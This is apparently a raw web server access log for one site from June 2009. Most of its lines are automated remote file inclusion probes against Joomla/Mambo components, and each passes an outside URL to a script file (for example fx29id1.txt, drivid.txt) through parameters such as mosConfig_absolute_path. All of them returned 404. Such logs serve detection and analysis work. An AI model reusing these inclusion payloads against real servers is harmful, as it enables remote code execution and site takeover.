217.147.30.80 - - [12/Jun/2009:09:02:37 -0700] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:02:57 -0700] "GET /logs/access_071012.log%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:02:57 -0700] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:03:00 -0700] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:03:06 -0700] "GET /logs/access_071012.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:03:14 -0700] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:03:51 -0700] "GET /logs/access_071012.log%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.bob-shirt.de//global/drivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:03:57 -0700] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.bob-shirt.de//global/drivid.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.38.207.231 - - [12/Jun/2009:09:04:01 -0700] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.bob-shirt.de//global/drivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:04:50 -0700] "GET /logs/components/com_rsgallery/errors.php?error=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:04:50 -0700] "GET /components/com_rsgallery/errors.php?error=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:04:50 -0700] "GET /logs/access_070912.log%20%20/components/com_rsgallery/errors.php?error=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:07:52 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [12/Jun/2009:09:08:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [12/Jun/2009:09:08:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:10:25 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:10:25 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:10:28 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:10:29 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:10:32 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:10:32 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:10:59 -0700] "GET /index.html HTTP/1.1" 200 9405 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:02 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/index.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:09 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
76.102.182.253 - - [12/Jun/2009:09:11:11 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:12:56 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:12:56 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:12:59 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:09:13:29 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:15:07 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:15:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:15:11 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:15:15 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:15:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:15:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:15:48 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:16:11 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:16:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:16:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:16:15 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:16:22 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:16:49 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:16:53 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:17:51 -0700] "GET /logs/access_071212.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:17:55 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:17:56 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:18:06 -0700] "GET /logs/access_071212.log/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:10 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:10 -0700] "GET /logs/access_070812.log/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:10 -0700] "GET /logs/access_071012.log/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:30 -0700] "GET /logs/access_070812.log/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:30 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:30 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:18:30 -0700] "GET /logs/access_071012.log/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:18:37 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:18:38 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
122.153.28.140 - - [12/Jun/2009:09:18:40 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:19:36 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:19:36 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:19:39 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:20:11 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:09:21:11 -0700] "GET /logs/access_070912.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:09:21:14 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:09:21:15 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:22:10 -0700] "GET /logs/access_070812.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:22:10 -0700] "GET /logs/access_071012.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:22:32 -0700] "GET /logs/access_070812.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:09:22:32 -0700] "GET /logs/access_071012.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:23:50 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:23:54 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:25:22 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:25:22 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:09:25:31 -0700] "GET /logs/access_071212.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:25:40 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:26:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:26:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:26:15 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:26:33 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:26:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:26:38 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:26:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:26:43 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:27:23 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:27:27 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:28:11 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:09:28:11 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:28:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:28:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:28:19 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:09:28:38 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:09:29:09 -0700] "GET /logs/access_071112.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:09:29:18 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [12/Jun/2009:09:29:23 -0700] "GET /logs/access_071012.log%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.rentpreview.com/demo//images/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
